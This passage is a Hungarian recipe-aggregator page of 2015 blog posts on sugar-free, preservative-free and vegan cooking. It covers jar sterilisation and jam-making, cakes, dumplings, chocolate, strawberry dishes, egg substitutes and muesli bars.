hőkezelés nélkül fogyasztott gabonák súlyos egészségügyi problémákat okozhatnak. vegyes gyümölcsös, házi müzliszelet (hozzáadott cukormentes, vegán) 

A befőzés fortélyai, avagy hogyan készítsünk tartósítószermentes finomságokat?

2015. augusztus 19. Éltető ételek 

A befőzés fortélyai, avagy hogyan készítsünk tartósítószermentes finomságokat?Még mindig él az a tévhit, hogy a lekvárt a cukor tartósítja és szalicil vagy nátrium-benzoát nélkül meg fog romlani a befőtt. Nos, ez tévedés! El lehet tenni ezeket a finomságokat télire mindenféle adalékanyagok nélkül is. De hogyan? A lényeg az üveg sterilizálása! Nem elég csak mosószerrel elmosni az üveget, én minden esetben kifőzöm azokat. Bár erre a célra a mikró is megteszi, de nekem nincs, így marad az üvegek főzése. A teljesen ép, jól záródó befőttesüvegeket mosószerrel mossuk el, öblítsük ki, majd egy nagy lábasba töltsünk vizet, és ebben forraljuk az üvegeket és fedőiket lefedve legalább 5-10 percig. A fertőtlenítés befejeztével egy tiszta konyharuhára, szájával lefele csöpögtessük le az üvegeket, de még véletlenül se törölgessük el, hiszen így nemkívánatos anyagok is bele kerülhetnek. Ennek hiányában a különféle gombák és baktériumok hatására több órás munkánk egykönnyen a penész martalékává válhat.  Mindenképp olyan méretű üvegeket válasszunk, ami 1-2 étkezés során elfogy. Ugyanis ezekben nincs tartósítószer, ezért 7-10 nap alatt megpenészedik még a hűtőben is. Teljesen mindegy, hogy milyen gyümölcsből szeretnénk befőttet készíteni , én minden esetben ezzel a módszerrel készítem. Tehát nem kell hozzá cukorszirupos víz, sőt még víz sem! Különféle fűszerekkel persze ízesíthetjük (vanília, fahéj, gyömbér, csillagánizs, stevia levél ...), de nem kötelező. Szilvalekvárt én minden esetben sokáig, jó sűrűre főzök.Viszont vannak olyan gyümölcsök, amelyekből dzsemet készíthetünk. Ebben az esetben elég 10-15 perces főzés is. Ilyenkor a sűrítésre agar-agart használok.  Az alapanyagokat minden esetben alaposan mossuk meg, öblítsük át . Majd jól vegyük szemügyre, hogy az eseteges hibákat kivágjuk belőle. Daraboljuk fel, és a belsejét is vizsgáljuk meg, nem kezdett-e belülről romlani. Amennyiben megtöltöttük az üveget pl. lekvárral, utána jól csavarjuk rá a kifőzött kupakot, majd állítsuk fejre úgy 5 percre . Így a benne lévő sterilizálódik, és vákuum képződik. Tehát jól behúzza a kupakot. Ezután jöhet a száraz dunszt, ami azt jelenti, hogy 1-2 paplant előveszünk, és ebbe tesszük az elkészült befőtteket, lekvárokat. Célszerű egyesével újságpapírba becsomagolni, hogy ne piszkítsuk be a paplant (esetleges törés, vagy a külsejére tapadt gyümölcs). Ennek az a célja, hogy szép lassan hűljön ki a finomság. 2-3 nap elteltével mehetnek is a kamra polcaira. Arra figyeljünk, hogy felbontás után hűtőben tároljuk, mert 1-2 héten belül megromlik (ha addig ne fogy el).

Gyors, cukormentes szilvás sütemény

2015. augusztus 12. Élj harmóniában 

Gyors, cukormentes szilvás süteményMegkezdődött a szilva szezon és a szilva jótékony hatásairól, már írtam bejegyzést (itt olvashatod).  Mi nagyon szeretjük a szilvát minden formában - nyersen, csatninak, süteményekbe.  Most egy nagyon kedvenc bögrés szilvás süti receptemet készítettem el. A bögrés süteményeket azért szeretem, mert gyorsan elkészíthetőek és még az alapanyagok adagolásához sem kell különösebb előkészület, mérleg, etc.... mindössze egy bögrére van szükségünk. Hozzávalók: - 18-20 db. szilva - 1,5 bögre teljes kiőrlésű tönkölybúzaliszt - 1,5 bögre fehér  tönkölybúzaliszt - 1 kk. szódabikarbóna - 1 csg. sütőpor - vanília -  fahéj - 1/­­2 bögre datolyacukor (ez egy természetes édesítő nincs finomítva, tulajdonképpen   datolya szárított, őrölt formában. Ha cukorral akarod készíteni barna nádcukrot használhatsz helyette vagy bármilyen más édesítőt) - 10 dkg vaj (vegán változatban kókuszzsír) A szilvákat mosd meg és szedd félbe. Egy tálba keverd össze a többi hozzávalót, majd adj hozzá 2 bögre vizet. A keveréket öntsd egy sütőpapírral kibélelt (vagy kivajazott, lisztezett) tepsibe. Helyezd a félbe szedett szilvákat a tetejére szépen sorba. Majd a tepsit helyezd egy 180 fokra előmelegített sütőbe és süsd meg (kb. 30-40 perc tűpróbával ellenőrizd). Vegyszermentes (bio) alapanyagokat használj!

Sárgabarackos gombóc (vegán)

2015. július 20. Zizi kalandjai 

Sárgabarackos gombóc (vegán) A barackos gombóc fotója elég nagy sikert aratott a Facebookon és az Instagramon is, meg jó páran kértétek is a receptet, szóval gyorsan be is gépelem. A sárgabarackos gombóc szerelem gyerekkoromban kezdődött… a ma már igencsak retronak számító Lajos Mari-Hemző Károly: 99 gyümölcsös édesség 33 színes ételfotóval könyvből ez volt a kedvenc fotóm. Nem tudom miért, de imádtam ezt a képet nézni és álmodozni a gombócról. Ha jó érett, puha barackot használunk ugyanolyan finom végeredményt kapunk, mintha szilvás változatban készítenénk. Lehet megszórni kevés fahéjas cukorral, de ez el is hagyható és akkor teljesen cukormentes lesz, csak az érett, szaftos, édes barack fogja megédesíteni egy kicsit. Természetesen volt segítség a konyhában… Ádi gyúrta a tésztát, majd nyújtotta a nagyi segítségével, a gombócok formázását pedig a nagyi csinálta, így nekem csak fotóznom kellett. Aki azt hiszi, hogy a gombóc készítése macerás, az nyugodtan álljon neki. Nem macerás, ráadásul gyorsan is készen van. Fincsi, nyári ebéd, amely mindig a gyerekkoromra emlékeztet! Sárgabarackos gombóc (vegán) Hozzávalók: – 5-6 szem közepes krumpli (kb. 450-500 g), meghámozva, felkockázva – 250-300 g liszt (amennyivel jól formázható, ruganyos tésztát kapunk) – 2 evőkanál napraforgó olaj + egy kevés a zsemlemorzsa pirításához – 10-15 db érett sárgabarack, kimagozva, kettévágva – csipet só – 1 teáskanál fahéj (elhagyható) – 3 teáskanál nádcukor (elhagyható) – 8 evőkanál teljeskiörlésű zsemlemorzsa – porcukor (elhagyható) Egy nagyobb lábasban kevés olajon néhány perc alatt megpirítjuk a zsemlemorzsát és félretesszük. A felkockázott krumplit sós vízben puhára főzzük. Amikor elkészült, leszűrjük, összetörjük, hozzáadjuk az olajat, majd lassan adagoljuk a lisztet és elkezdjük gyúrni. Miután összeáll a tészta, felteszünk egy fazékba vizet forralni. Kilisztezett nyújtólapon vagy deszkán kinyújtjuk a krumplis tésztát 0,5-1 cm vastagságúra. Kb. 10*12 cm-es kockákat vágunk a kinyújtott tésztából. Ez persze nem kötelező méret, függ attól is, hogy mekkorák a barackok. A tészta kockákra helyezünk egy-egy fél barackot, megszórhatjuk fahéjas nádcukorral, majd a tésztával körbe vonjuk, gombócot formálva. A gombócokat belehelyezzük a lobogó vízbe (ha nem fér bele egyszerre, főzzük több adagban, hogy a gombócok ne tapadjanak össze; közben a vizet nem kell cserélni, ugyanabban főzzük végig). Akkor vannak készen a gombócok, ha feljönnek a víz felszínére. A lecsöpögtetett gombócokat a pirított zsemlemorzsába tesszük és jól átforgatjuk, hogy mindenhol befedje őket a morzsa. Tálaláskor szórhatunk még rá porcukrot.

Kókuszos málna torta

2015. július 6. Fittanyuka 

Kókuszos málna torta    A nyári melegben ha valami könnyűre, finomra, vegánra, cukormentesre és egyben gluténmentesre vágysz, az alábbi torta nagyszerű választás. A kókusz jól harmonizál a friss, savanykás málnával, tulajdonképpen bármelyik kedvenc gyümölcsünkkel elkészíthetjük. Jól illenek a kókuszhoz az egzotikus és a bogyós gyümölcsök egyaránt. Hozzávalók a piskóta alaphoz: 200 g rizsliszt 100 g gluténmentes lisztkeverék (Mantler terméket preferálom) 50 g kókuszreszelék 350-400 ml víz 150 g eritrit 1/­­2 citrom lereszelt héja 6-8 evőkanál folyékony (szobahőmérsékletű) kókuszolaj 1 tasak foszfátmentes sütőpor   Krém hozzávalói: 200 ml kókusztejszín 100 g eritrit 50 g kókuszreszelék 4-5 evőkanál kókuszreszelék 2-3 evőkanál bio margarin 1/­­2 kk bourbon vanília Friss málna, tetszőleges mennyiség A piskótához a száraz hozzávalókat összekeverjük, majd robotgép segítségével a vízzel, olajjal is alaposan összedolgozzuk. Egy kis kapcsos tortaformát (10-12 szeletes) kiolajozunk, kilisztezünk és beleöntjük a tésztát. Légkeveréses sütőben 200 fokon 10 percig, majd további 30 percig 180 C fokon sütjük. Szúrópróbát végzünk mielőtt kivesszük a sütőből. A krémhez hidegen egy kézi habverő segítségével csomómentesen elkeverjük, majd állandó keverés mellett addig főzzük ameddig besűrűsödik, hozzáadjuk utólag a margarint, elkeverjük. Tortapántba visszahelyezzük a piskótát és ráöntjük a még meleg krémet. Hagyjuk hűlni minimum 2-3 óra hosszát, majd hűtőszekrényben teljesen kihűtjük, akkor fog igazán összeállni, amikor levehetjük a tortapántot. Friss málnával tálaljuk.          

Meggylekvár (cukormentes, de édes)

2015. június 25. VegaLife 

Meggylekvár (cukormentes, de édes)Rájöttem, hogy alapjába véve nagyon szeretem a lekvárokat, különösképpen a házilag készített lekvárokat. Igen, azokat, amiket nem gyárban készítenek, hanem valaki az otthonában főzi, keveri, édesíti, beleteszi a szeretetét Legalább is én mindig jó érzéssel készítem, főzőm be őket. (Idén sajnos lehet kimarad a lekvárfőzés, aminek nyomós oka van, egy változás, ami előtt állunk, ami majd az olvasónak is kiderülhet a későbbiekben, ha sikerrel járunk...) Jól esik télen, tavasszal elővenni őket, amikor már gyümölcs alig beszerezhető, megízesíteni vele a palacsintát, reggeli kását, süteményt, stb. Tavaly nyáron (2014-ben) a fb-on találtam rá egy ismerősöm "hirdetésére", miszerint a sok gyümölcstől omladozó meggyfáit le lehet szedni. Teljesen ingyen. Köszönöm Timinek, a kétgyermekes anyukának, a lehetőséget, mivel így készülhettek el a meggylekvárjaim, amelyek nem tartalmaznak cukrot, sem zselatint, mégis dzsemmes állagúra sikerültek. Mi a titka? Kiderül a receptből! A recept:    Hozzávalók: - kb. 4 -5 kg meggy - 50 dkg datolya (vagy több, ha édesszájúbbaknak készül) - útifűmaghéj - üvegek - befőzési fólia   Elkészítés: Mint minden befőzés, úgy ez is két nélkülözhetetlen alappal indul. - A gyümölcsök alapos átmosása (háromszor is megfürödtek jó hideg vízben), és természetesen az esetleges rossz szemek kiválogatása, meggy kimagozása (Köszi Judit a meggymagozót! :) Férjemnek meg a kimagozást! :) ) - Az üvegek előkészítése. A következő hadművelettel érdemes ezt végezni: Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda, karcmentesek. Mossuk el őket, ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már felforrt a víz mindegyik üvegben, kivehetjük a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lekvárunk. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat. A lekvár elkészítése: Miután alaposan átmostuk, majd kimagoztuk a meggyet, odatesszük főzni és közben krumplinyomóval kicsit áttörjük a gyümölcsöt, vagy botturmixot is használhatunk erre a célra. Míg a gyümölcs melegedik, a datolyákat előkészítjük. A datolyaszemeket (mag nélkül) meleg vízben kicsit átmossuk, majd felaprítjuk őket. Ízlésünknek megfelelően édesíthetjük vele a lekvárt. Nekem a 50 dkg datolya elég volt. A felaprított datolyákat hozzákeverjük a lekvárhoz. Dzsemmes állagát az útifűmaghéjnak köszönheti, amit a lekvárfőzés utolsó 10-15 percében keverjünk az addigra szétturmixolt meggyhez, literenként kb. 1 nagy púpozott evőkanállal. (Igyekeztem úgy összeturmixolni a gyümiket, hogy maradjon néhány meggy egészben is, mert így sokkal jobban szeretem a meggylekvárt.) A vízzel felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet és a helyére az elkészült dzsemet öntjük. A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk majd előkészített meleg helyre fejjel lefelé állítjuk. A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy tiszta lavorban. De máskor már rekeszbe is tettem, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog. Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 24 óra kell nekik, ha nem több. Szóval ellenőrizni ráér másnap este. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni. Természetesen maradt ki még egy kevés, ami nem került üvegbe. Gyorsan el is fogyott. Lekvárfőzésnél megeshet, hogy nem tudjuk az egészet üvegbe tölteni. Tiszta edénybe rakva (akár üveg) a hűtőben egy darabig megőrzi minőségét. Bár szerintem előbb elfogy, mint megromlana.

Házi készítésű, egyszerű, cukormentes csokoládé

2015. június 8. Élj harmóniában 

Házi készítésű, egyszerű, cukormentes csokoládéA csokoládét sokan szeretik, de a boltban kapható csokoládék nem mondhatóak túl egészségesnek.  Ha saját magadnak készítesz csokoládét, akkor még az egészségedért is sokat tehetsz, ha nagyon jó minőségű alapanyagokból készíted. Ma találtam itthon egy doboz bio kakaóvajat és gyorsan készítettem egy kis házi csokoládét a férjemnek. A kakaó egészségesebb alternatívája a szentjánoskenyérfa termése a karob (carob), én azzal készítettem, de a recept elkészíthető kakaóporral is. Arra figyelj, hogy cukormentes kakaóport válassz. Amennyiben kakaóval készíted lehet, hogy egy evőkanál mézet vagy nádcukrot érdemes hozzátenni, mert a karob édesebb, mint a kakaó.  Hozzávalók: - 12 dkg kakaóvaj - 5 dkg karob por (vagy kakópor) - 10 dkg finomra őrölt mandula - 7-10 dkg datolya apróra vágva (lehet bármilyen aszalt gyümölcs) - csipet vanília A kakaóvajat tedd egy tálba és vízgőz felett olvaszd fel. majd a többi hozzávalót add hozzá és keverd össze.  A masszát öntsd egy tálba vagy bonbon formákba és helyezd a hűtőbe egy kis időre.Kivétel után fel tudod szeletelni vagy kivenni a formákból. A hozzávalókat kedvedre variálhatod is. Ha gyenge az emésztésed akkor kardamomos vagy gyömbéres fűszerezéssel tudod a csokoládét könnyebben emészthetővé tenni. Ez egy friss csokoládé és nem tartalmaz semmilyen tartósítószert, ezért nem tudod hosszasan tárolni. Valószínűleg nem lesz ideje megromlani:) Vegyszermentes (bio) alapanyagokat használj!

Befőzés tartósítószer-és cukormentesen

2015. június 2. Mindennapi ételeink 

Befőzés tartósítószer-és cukormentesen Érnek a finom eprek, lassan itt a cseresznye, meggy, indulhat a befőzés! Ehhez adok tippeket. Mi idén a Naturpiac jóvoltából stevia-val és gyümölcscukorral tesszük el a gyümölcsöket. :-)  Hogyan főzzünk be - tartósítószer nélkül?   -  Szedjünk össze különböző űrtartalmú üvegeket és a hozzájuk tartozó csavaros tetőket. Ellenőrizzük, nem rozsdásodik-e a tető belseje, sérületlen-e a menete, nincs-e bármilyen hiba rajta. (Azért javasolt különböző nagyságú üvegeket használni, mert a tartósítószer-mentes lekvárok a felbontás után még hűtőben is könnyen penészednek, így mindig akkora üveget nyithatunk, amennyi 2-3 napon belül majd elfogy.) -    Egy nagy befőző fazékban forraljunk fel 10-15 litervizet, öntsünk bele fél liter ecetet. (A 10 és a 20 %-os ecet is megfelel a célnak.) - A míg az ecetes vizet felforraljuk, forró vízzel mossuk át az üvegeket, így nem fognak elpattanni, amikor óvatosan beleengedjük  a forrásban lévő ecetes vízbe   Egyszerre két-három üveget főzzünk ki, tegyük a vízbe a tetejüket is. 5 percig hagyjuk a forró vízben.  -  Fakanál segítségével egyesével emeljük ki az üvegeket a hozzájuk tartozó csavaros tetővel. Rázzuk ki a felesleges vizet, és még üresen, forró állapotban tekerjük rá   a tetőt. Ezt a műveletet végezzük el az összes üveggel. (Ha nyitva hagynánk  az üvegeket, a levegőben lévő csírák ugyanúgy belekerülhetnének az üvegbe, mintha ki sem fertőtlenítettük volna.) -  Készítsük el a lekvárt úgy, ahogy szoktuk, felfőzéssel, recepteket később írok a steviaval kapsolatban .   -  Amikor a gyümölcspép - folyamatos kavargatás mellett! - párat már rottyant, az ecetes vízben szintén kifőzött szedőkanalunkkal mérjük az üvegekbe a lekvárt. Mindig csak az az üveg legyen nyitva, amelyikkel dolgozunk. Amikor megtelt lekvárral, tekerjük rá a tetőt, és fordítsuk pár percre fejre. Így egyrészt ellenőrizni tudjuk, hogy nem tekertük-e félre a tetőt, másrészt a tűzforró lekvár még egyszer csírátlanítja a tetőt. Végig fogókesztyű legyen mindkét kezünkön.  Fordítsuk vissza az üvegeket, tekerjük az üveget újságpapírba, majd az előre elkészített helyre, párnák, paplanok közé téve tegyük ún. száraz dunsztba. Tartsuk ott 4-5 napig, amíg kihűlnek az üvegek. (Az újságpapír hőszigetelő, valamint megóvja az ágyneműt   a lekvárnyomoktól. EPERLEKVÁR - stevia-val: Hozzávalók: 1 kg eper 2 tk. stevia 1 citrom leve Elkészítés: Az epret egy kevés vízzel tegyünk fel főni, majd amikor a gyümölcs megpuhult, botmixerrel kicsit pürésítsük. A steviát keverjük ki a citromlével, és adjuk a gyümölcshöz. 30-40 perc főzés után töltsük üvegekbe.  MÁLNALEKVÁR stevia-val: Hozzávalók: 1 csomag pektin  3 csésze hideg víz  1 ek. stevia 1/­­2 kg málna Elkészítés: A pektint keverjük ki a hideg vízzel és egy edényben forraljuk fel. Ekkor adjuk hozzá a málnát, a steviaport, és sűrű keverés között 1-2 percig főzzük. Ezután tegyük üvegekbe.  MANDULÁS SÁRGABARACK LEKVÁR - gyümölcscukorral  Tapasztalatom szerint a sárgabarack lekvár kicsit kesernyés lesz stevia-val ízesítve, így  Hozzávalók: 2 kg sárgabarack 10 dkg mandula 30 dkg gyümölcscukor Elkészítés: A barackot mossuk meg, vágjuk félbe, vegyük ki a magját, a mandulát daráljuk meg, majd az összes hozzávalót tegyük lábasba  és 30-40 percig forraljuk fel. Ezután tegyük üvegekbe.  - 

5 kedvenc epres ételem

2015. május 20. Gréta konyhája 

5 kedvenc epres ételem Az eper megunhatatlan, s bár szezonja alig másfél hónapig tart, nem lehet belőle eleget enni. Mindamellett, hogy zsírégető, és tisztító hatású nagyon finom is, akár édesen, de sósan is elkészíthető. Az epret vétek megsütni vagy megfőzni, ezért összegyűjtöttem az 5 kedvenc cukormentes, nyers, gluténmentes, epres receptemet. Jó étvágyat! Epermousse (főzésmentes, gluténmentes) 2 bögre mosott, darabolt eper 3 dl selyem (silken) tofu 2 ek agavé nektár vagy stevia cseppek 1 ek olvasztott nyers kókuszolaj csepp vanília aroma Az epret egy turmixgépbe tesszük az agavé-vel, vaníliával és lepürésítjük, mozgás közben hozzáadjuk a selyemtofut, majd a nyers kókuszolajat is belecsurgatjuk. 1 percig összeturmixoljuk. Kis poharakba töltjük, és minimum 2 órára hűtőben hűtjük. Epres banánfagyi (mindenmentes) 1 bögre fagyasztott eper 2 bögre fagyasztott banánkarika (érdemes egyben fagyasztani a banánt, már két nappal előtte. a banán érett legyen!!!) 3 ek mandulatej (vagy bármilyen növényi, amit szeretsz) Először az epret a mandulatejjel aprítom, én ezt a turmixgép jégkocka funkciójával művelem. Majd jöhet hozzá a banán, addig turmixolom, míg habos, fagyikrémes lesz. Azonnal fogyasztható! Epres-újhagymás salsa szósz: 1-2 bögre mosott eper kisebb kockákra darabolva 3 szál zsenge újhagyma karikára vágva öntet: 1 gerezd préselt fokhagyma tiszta só, bors 1 ek sötét balzsamecet vagy fél citrom leve 1 ek juharszirup (vagy agave, vagy rizs) Az epret és a vékonyra felkarikázott újhagymát egy szószos tálba tesszük. Összekeverjük a dresszinget, majd leöntjük vele az epres hagymás keveréket és pár órára állni hagyjuk. Nagyszerű mondjuk kukorica torttilával, vagy csicseriborsó lepénnyel, bármilyen sült tofuhoz, mártogatósként, köretként. Tavaszi epersaláta: Egy nagy salátástálba belevágjuk a kedvenc tavaszi zöldjeinket, pl spenót, sóska, fejes saláta, újhagyma, petrezselyem, jól összeforgatjuk, készítünk hozzá egy édes savanyú vinaigrette öntetet, pl a fenti balzsameceteset, majd hozzávágunk szép szeletekre, 2 marék epret, meglocsoljuk az öntettel, összekeverjük, és vagy magában, vagy köretként, bármilyen napszakban, bármivel fogyaszthatjuk. Pink power smoothie: (tökéletes edzések után) 2 bögre eper 3-4 dl mandula, mogyoró-, vagy kókusztej 3 banán 1 ek vörös szőlőmag őrlemény 1 ek kendermag őrlemény csipet tiszta só pici vanília kivonat 1 adagolókanál (20 gramm) vegan protein (rizs, vagy borsófehérje, de NEM szójaizolátum! Mindent egy nagy turmixkehelybe rakunk, és jól összeturmixoljuk! Jó étvágyat!

Tojás helyettesítők

2015. április 15. Zizi kalandjai 

Tojás helyettesítők Ez a bejegyzés már elég régóta a fejemben volt, most végre összegyűjtöttem az ismereteimet, böngésztem az internetet új információk után, mert a listán szerepelnek olyanok, amelyeket még én sem próbáltam. A tojás helyettesítésére szükségünk lehet, ha kizárjuk az étrendünkből a tojást (vegán életmód) vagy mert allergiásak vagyunk rá. A tojás elsősorban kötőanyagként vagy “élesztőként” szolgál a főzés és sütés során. A kötőanyag összetartja az ételt, süteményt; az “élesztő” pedig segít megemelni. Vannak olyan ételek, sütemények, amelyekben szerintem nem lehet kiváltani a tojást, de minél gyakorlottabbak vagyunk a tojásmentes étkezésben, annál több sikert tudunk elérni újabb és újabb receptek kipróbálásakor vagy megalkotásakor. A tojás leginkább süteményekben  – muffin, torta, keksz – váltható ki, bár rántotta is készíthető tojás nélkül, tofuból. Előfordulhat, hogy a helyettesítők közül egyszerre többet is használunk egy receptben… biztos, ami biztos. Lássuk a listát, mivel lehet helyettesíteni a tojást… 1. Chia mag – 1 evőkanál chia mag + 3 evőkanál víz = 1 tojás Egy tálkában keverjük össze a chia magot a vízzel és hagyjuk állni kb. 10 percig, amíg teljesen zselés állagú lesz. Ezután adjuk hozzá az ételhez. Én többnyire sütemények készítésekor szoktam használni (mandulás banánkenyér), de “összeragaszthatunk” vele fasírtot is (lencse-dió burger, karfiolos quinoa fasírt, savanyú káposztás kölesfasírt). 2. Darált lenmag – 1 evőkanál lenmag + 3 evőkanál víz = 1 tojás Ez nagyjából ugyanúgy működik, mint a chia mag. Összekeverjük a lenmagot a vízzel és megvárjuk, amíg zselés állagú lesz. Íme néhány példa a használatára: sütőtökös áfonyás diós muffin, kókuszos répa muffin, mandulás földimogyorós keksz, földimogyoróvajas banánkenyér. 3. Érett banán – 1 banán = 1 tojás A banánt hámozzuk meg és törjük villával pépesre, így adjuk a süteményhez. Egyes helyeken csak fél banánt használnak egy tojás helyettesítésére, de én mindig egy teljes banánt használok. Nagyon jó kötőanyagként szolgál és nedvesen tartja a sütemény tésztáját. Néhány példa: banános mandulavajas gofri, csokoládés keksz. 4. Almaszósz – kb. 1/­­4 bögre almaszósz = 1 tojás Készíthetünk saját magunk cukormentes almaszószt, de gyorsabb megoldást ígér, ha veszünk bolti baba almapürét/­­almaszószt és azt használjuk. Előfordult már, hogy baba reszelőn reszeltem le az almát, hogy pürés állaga legyen, ez is viszonylag egy gyors megoldás. Néhány példa: almaszószos fahéjas keksz, kókuszos répa muffin. 5. Agar-agar – 1 evőkanál agar-agar + 1 evőkanál víz = 1 tojás Én tojás helyettesítésére még nem használtam ezt a változatot, inkább csak zselatin helyettesítésére például ennél a kocsonyánál vagy ennél a kávés panna cottánál. 6. Földimogyoróvaj – 3 evőkanál földimogyoróvaj = 1 tojás Ha a földimogyoróvaj jól ragaszt, akkor szerintem a mandulavaj is. Én inkább az íze és a benne lévő tartalom miatt adtam eddig ételekhez, nem pedig kimondottan tojás helyettesítésére. Példák: mandulás földimogyorós keksz, földimogyoróvajas muffin datolya sziruppal.

Pikk-pakk kész, Gyümölcsös Kókuszgolyók, mindössze pár hozzávalóból (laktóz-, gluténmentes, vegán, nyers)

2015. április 5. Zöld Avocado 

Pikk-pakk kész, Gyümölcsös Kókuszgolyók, mindössze pár hozzávalóból (laktóz-, gluténmentes, vegán, nyers) Ezek a gyorsan és egyszerűen elkészíthető nyers finomságok a Húsvét kedvéért tojás alakúak, de természetesen az év egyéb napjain, golyók formájában is ugyanolyan finomak, és mutatósak. ;-) gyümölcsös kókuszgolyók (nyers, vegán, mindenmentes) Mindössze 4+1 hozzávaló, pár perc gyurmázás, és készen is vannak ezek a színes, gyümölcsös, könnyen emészthető, glutén-, laktóz-, és cukormentes, vegán, tápanyagtól duzzadó, vitaminban és ásványi anyagban gazdag, nyers édesség falatkák, sütés, főzés és egyéb előkészületek nélkül! :-)  Bármikor gyorsan elkészthetjük őket, ha pl.: váratlanul bejelentkeznek a rokonok vagy barátok, akik este betoppanának egy kis csevejre. Reméljük, hogy szeretik a kókuszt! ;-)    Azt gondoltam, hogy könnyedén lehet tojás formákat készíteni, de hamar be kellett látnom, hogy egyáltalán nem egyszerű feladat! Vagy túl hengeres lesz, vagy csúcsos, vagy... egyáltalán nem hasonlít egy tojásra a kapott végeredmény! :-) Még jó, hogy legközelebb egyszerűen csak golyókat kell formáznom a nyers tésztából, mert az ízén nem változtat! :-D És hogy milyen az íze? Könnyed, puha, hűvös édesség, a választott gyümölcstől függően édesebb, vagy éppen savanykásabb kivitelben. Ha nagyon édes szájúak vagyunk használjunk éretebb, már barnuló banánokat alapanyagnak, és a választott szín, íz, azaz a gyümölcs is legyen édes gyümölcs pl.: sárgabarack.  És akkor nézzük a recepteket! ;-) Gránátalmás, Sárgabarackos, és Kivis  kókuszgolyók /­­ tojások   HOZZÁVALÓK: az alap "tésztához" - kókuszreszelék - mandula liszt /­­ darált mandula - banán  - útifűmaghéj        A választott ízesítéstől, azaz a gyümölcstől függően változnak az alapanyagok mennyiségei. Minél lédúsabb a gyümölcs, annál több, szilárd anyag kell bele. Nézzük konkrétan azt a három receptet, amit én készítettem el.  a gránátalmás kókusz golyóhoz  (kb.20 darab) : - 80 g kókuszreszelék - 25 g mandula liszt - 2 érett banán - 1/­­2 ek útifűmaghéj - 1,5 közepes gránátalma  a sárgabarackos kókuszgolyóhoz (kb.20 darab) : - 50 g kókuszreszelék - 25 g mandula liszt - 1 érett banán - 1/­­2 ek útifűmaghéj - 100 g jó minőségű aszalt sárgabarack (előre be kell áztatni vízbe) a kivis kókuszgolyóhoz  (kb.20 darab) : - 80 g kókuszreszelék - 50 g mandula liszt - 2 érett banán - 1 ek útifűmaghéj - 4 db kemény kivi ELKÉSZÍTÉS: Keverj össze mindent, gyurmázz-formázz, tedd az egészet hűvösre, és hammm már fogyasztható is! :-)  Egy kicsit részletesebben: a kókuszreszeléket, a mandula liszttel, és az útifűmaghéjjal (fontos, mert ez szívja magába a felesleges folyadékot) összekeverjüók egy tálban. A banánt, és a választott gyümölcsöt a turmixgépben pépessé turmixoljuk, majd a gyümölcs pépet a "száraz anyag" - gal összegyúrjuk. Tojásokat vagy golyókat formázunk, és betesszük 1-2 órára a hűtőbe, hogy jobban összeálljanak az alapanyagok. Természetesen hűtés nélkül is fogyasztható, de a tökéletesebb állag eléréséért javasolt egy kis pihenő a hidegben.  Ha aszalt gyümölcsből készítjük az édességet pl.: sárgabarackból, akkor az aszalt gyümölcsöt áztassuk be egy kevés vízbe 2-3 órával a desszert elkészítése előtt. Majd öntsük le róla a vizet, mielőtt felhasználjuk a kipuhult aszalt gyümölcsöt.  És ennyi! Ugye milyen egyszerű? Ez a rövidke hozzávaló lista, és elkészítési mód, mindjárt 3 különböző desszert receptet is tartalmazott! Ráadásul bárki könnyedén elkészítheti őket, különlegesebb konyhai tapasztalat nélkül! Sőt! Még akár a gyerekeket is bevonhatjuk a közös édesség készítésbe, ami ráadásul még egészséges is. Gyurmázásra fel! ;-)  gyümölcsös kókuszgolyók (nyers, vegán, mindenmentes) Megjegyzés1: ha a kókuszreszelékünk nem elég apróra reszelt, daráljuk meg egy kicsit felhasználás előtt, hogy könnyedebben összeálljon a nyers tészta.  Megjegyzés2: Az internet telis tele van kreatív ehető alkotásokkal, étel kreálmányokkal, vicces tálalásokkal. Megosztok pár húsvéti ötletet veletek, amit egyszer biztosan ki fogok próbálni, mert egyszerűek és mutatósak! :-)  kelttésztából nyuszikáknyuszis palacsintanyuszis gyümölcstál

Cukormentes, almás müzliszelet

2015. március 8. Éltető ételek 

Cukormentes, almás müzliszeletMár több müzliszeletet készítettem, mindig sikerül egészen mást alkotnom. Az első egy kissé morzsalékos lett, bár az íze kárpótolt ettől az apró problémától. A második próbálkozás, na az igazi bolti állag, annál viszont sokkal finomabb íz. Számomra mégis azért maradt fejlesztés állapotába, mert szerintem egy kissé sok benne az olajos mag és a zsír. Na, azért ettől függetlenül az utolsó morzsáig elfogyott... A mai próbálkozás eredménye egy puha, de mégis finom müzliszelet lett. Hozzávalók: - 20 dkg zabpehely - 2 közepes alma - 10 dkg dió - 10 dkg mazsola - 3 dkg aszalt szilva (kis kockára vágva) - 3 dkg aszalt áfonya - 2 evőkanál arany lenmag - 1 evőkanál szezámmag - 1/­­2 narancs leve (és rostja is) - 1 kávéskanál fahéj - 1/­­2 kávéskanál vaníliapor - 2 dkg kókuszolaj Elkészítése: Először is áztassuk be a mazsolát, de csak annyi vízbe, ami éppen ellepi.Tegyük egy zacskóba a diót, majd az esetleges egy kis stressz levezetés jön. Húsgloffolóval jó alaposan verjük szét a diót, morzsalékos, kissé darabos legyen.Az almát mossuk meg, majd szőröstül-bőröstül kockázzuk fel, és az áztatott mazsolával (és a vízével együtt) turmixoljuk krémesre.Mérjünk ki mindent, jól keverjünk össze, és hagyjuk addig állni, amíg a sütőt bemelegítjük. Ez legyen 